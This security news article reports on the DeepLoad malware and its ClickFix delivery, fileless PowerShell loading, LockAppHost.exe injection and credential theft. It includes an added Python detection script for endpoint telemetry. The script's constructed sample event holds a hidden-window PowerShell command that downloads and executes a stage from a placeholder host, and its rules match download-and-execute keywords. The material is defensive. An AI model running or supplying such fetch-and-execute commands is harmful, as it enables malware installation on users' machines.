A newly emerging malware strain known as DeepLoad is being actively deployed in real-world attacks, targeting Windows users with advanced techniques designed to steal credentials and cryptocurrency assets. First identified in early February on a dark web cybercrime forum, DeepLoad was advertised as a centralized platform capable of delivering multiple types of malware. Researchers at ZeroFox initially observed its promotion as a tool for credential theft, fake wallet replacement, and malicious browser extensions, making it particularly attractive within cybercrime-as-a-service (CaaS) ecosystems.

Cybersecurity firm ReliaQuest has now identified the first in-the-wild campaign distributing DeepLoad. The attack leverages the increasingly popular ClickFix technique, which tricks users into executing malicious commands themselves. Victims are presented with fake browser error messages instructing them to paste a command into the Windows Run dialog or terminal to “fix” an issue. Instead, the command launches a persistent PowerShell loader that installs DeepLoad on the system.

The malware dynamically creates a secondary payload as a DLL in the Temp directory, using randomized filenames to evade detection. It disables PowerShell command history and directly interacts with Windows core functions to bypass common monitoring tools. Additionally, it injects itself into the legitimate LockAppHost.exe process via asynchronous procedure call (APC) injection, enabling stealthy, fileless execution within system memory. Because the payload executes in memory without writing decoded files to disk, traditional security tools may fail to detect the intrusion.
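The behaviours described in the two paragraphs above (a PowerShell loader launched from the Run dialog, command history suppression, a randomly named DLL written to Temp, and LockAppHost.exe being touched by a scripting host) each leave a trace in ordinary endpoint telemetry. The following is an added detection example, not code from ReliaQuest, ZeroFox, or the article; it assumes Sysmon-like event dictionaries, the sample events are constructed rather than real campaign data, the LockAppHost.exe path and all filenames are placeholders, and the "randomized name" check is a deliberately crude heuristic that should be tuned against a baseline before use.

```python
"""Heuristic triage of process/file telemetry for DeepLoad-style behaviours.
Assumed event shape: Sysmon-like dicts. SAMPLE_EVENTS are constructed for
illustration and are not indicators from the actual campaign."""
import ntpath
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}

# Constructed sample telemetry (paths and names are placeholders).
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "Set-PSReadLineOption -HistorySaveStyle SaveNothing; '
                'iwr http://example.invalid/stage | iex"'},
    {"type": "file_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\q7x2k9mzp4v1.dll"},
    {"type": "process_create", "image": r"C:\Windows\System32\LockAppHost.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "LockAppHost.exe"},
    # Benign baseline: scheduled admin script and a vendor installer log.
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Admin\deploy.exe", "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
    {"type": "file_create", "image": r"C:\Program Files\Vendor\setup.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\vendor_setup_log.txt"},
    # Sysmon-style process access: a script host opening the lock screen host process.
    {"type": "process_access", "source": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Windows\System32\LockAppHost.exe", "granted_access": "0x1FFFFF"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def looks_random(stem: str) -> bool:
    """Crude heuristic for machine-generated names: 8+ alphanumerics, no
    separators, letters and digits interleaved at least four times."""
    if not re.fullmatch(r"[a-z0-9]{8,}", stem.lower()):
        return False
    kinds = ["d" if c.isdigit() else "a" for c in stem]
    transitions = sum(1 for a, b in zip(kinds, kinds[1:]) if a != b)
    return transitions >= 4


def check_event(ev: dict) -> list:
    """Return the names of every rule the event trips (possibly none)."""
    hits = []
    kind = ev.get("type")
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "").lower()

    if kind == "process_create" and image in {"powershell.exe", "pwsh.exe"}:
        # ClickFix: the user pastes into the Run dialog, so explorer.exe is the
        # parent and the command typically hides its window and pulls a stage.
        if parent == "explorer.exe" and re.search(
                r"-w(indowstyle)?\s+hidden|iex|invoke-expression|downloadstring|iwr|invoke-webrequest", cmd):
            hits.append("clickfix_powershell_from_run_dialog")
        # Command history suppression (ATT&CK T1562.003-style behaviour).
        if "historysavestyle" in cmd and "savenothing" in cmd:
            hits.append("powershell_history_disabled")

    if kind == "file_create" and image in SCRIPT_HOSTS:
        path = ev.get("path", "")
        stem, ext = ntpath.splitext(basename(path))
        if ext == ".dll" and "\\temp\\" in path.lower():
            hits.append("dll_dropped_in_temp_by_script_host")
            if looks_random(stem):
                hits.append("randomized_dll_name")

    # LockAppHost.exe is a Windows component; a scripting host as its parent,
    # or a scripting host opening a handle to it, is worth an analyst's look.
    if kind == "process_create" and image == "lockapphost.exe" and parent in SCRIPT_HOSTS:
        hits.append("lockapphost_spawned_by_script_host")
    if kind == "process_access" and basename(ev.get("target", "")) == "lockapphost.exe" \
            and basename(ev.get("source", "")) in SCRIPT_HOSTS:
        hits.append("script_host_opened_lockapphost")
    return hits


def triage(events: list) -> list:
    """Run every rule over every event; findings carry the event index."""
    return [{"event": i, "rule": rule} for i, ev in enumerate(events) for rule in check_event(ev)]


def rules_fired(events: list) -> set:
    return {f["rule"] for f in triage(events)}


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"event {finding['event']}: {finding['rule']}")
```

The rules are intentionally narrow (explorer.exe as the PowerShell parent, a script host writing a DLL under Temp, a script host as the parent of or holding a handle to LockAppHost.exe) so that the benign baseline events produce no findings; in production these would be correlated by host and time window rather than evaluated per event.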

DeepLoad is designed to begin stealing sensitive information immediately upon infection. It deploys a standalone credential stealer alongside the main loader, while separating data exfiltration from command-and-control communications to further evade detection.

Additionally, the malware installs a rogue browser extension capable of monitoring nearly all user activity, including:

  • Active login sessions
  • Open browser tabs
  • Session tokens
  • Saved passwords

This level of access puts both personal and enterprise data at significant risk.

ReliaQuest also observed instances of DeepLoad spreading via USB drives, although it remains unclear whether this capability is built into the malware itself or deployed by its operators as part of the attack chain.

DeepLoad’s architecture and capabilities indicate it was purpose-built for large-scale cybercriminal operations, particularly those targeting cryptocurrency theft. Its combination of social engineering, fileless execution, and modular payload delivery highlights the evolving sophistication of modern malware. Security experts warn that organizations and individuals must remain vigilant against social engineering tactics like ClickFix, avoid executing unknown commands, and implement robust endpoint monitoring to detect unusual system behavior. As DeepLoad campaigns continue to evolve, it represents a significant addition to the growing landscape of stealthy, AI-era cyber threats designed for speed, scale, and financial gain.
